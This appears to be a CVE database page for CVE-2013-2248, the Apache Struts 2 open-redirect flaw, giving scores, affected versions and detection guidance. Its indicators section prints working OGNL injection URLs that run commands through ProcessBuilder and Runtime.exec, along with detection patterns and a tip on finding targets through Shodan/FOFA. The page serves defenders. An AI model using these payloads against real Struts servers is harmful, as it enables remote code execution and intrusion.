cbcvebase.
CVE-2013-2248
published 2013-07-20

CVE-2013-2248: Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct…

PriorityP344medium5.8CVSS 2.0
AVNACMAuNCPIPAN
EXPLOIT
EPSS
94.65%
99.8th percentile
Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.

Affected

44 ranges· showing 25
VendorProductVersion rangeFixed in
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts
apachestruts

Detection & IOCsextracted from sources · hover to see the quote

url{{BaseURL}}/index.action?redirect:http://www.interact.sh/
urlhttp://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/
urlhttp://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23
url/bar.action?redirect:http://www.google.com/%25{1000-1}
urlhttp://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
urlhttp://host/struts2-blank/example/X.action?action:%25{3*4}
urlhttp://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
urlhttp://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
urlhttp://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
command%{#_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime().exec('your commands')}
command%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),@java.lang.Runtime@getRuntime().exec('your commands')}
yara
regex: '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
  • Detect exploitation attempts by inspecting HTTP request parameters for the 'redirect:' or 'redirectAction:' prefixes in query strings or request bodies targeting any .action endpoint.
  • Both %{expr} and ${expr} OGNL expression notation can be used in the redirect: / redirectAction: parameter values; filter for both patterns.
  • Attack payloads may appear in both the query string and the HTTP request body; inspect both locations for redirect:/redirectAction: prefixed parameters.
  • A successful exploit produces an HTTP 302 response with a Location header pointing to an attacker-controlled URL; monitor for 302 responses from .action endpoints where Location does not match the application's own domain.
  • All Struts2 applications using DefaultActionMapper are vulnerable; fingerprint targets via Shodan/FOFA queries for 'apache struts', 'struts2 showcase', or 'struts problem report' in HTTP responses.
  • ProcessBuilder-based OGNL payloads (new java.lang.ProcessBuilder) in redirect: parameters indicate active RCE exploitation beyond simple open redirect; alert on this string in HTTP parameters.
  • ·The action: prefix can only be used for attacks if wildcard mapping is enabled in the Struts2 configuration; redirect: and redirectAction: are not constrained by configuration and are universally exploitable.
  • ·After upgrading to 2.3.15.1+, redirect: and redirectAction: parameters are completely dropped and will no longer function; this may break existing application functionality relying on these prefixes.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.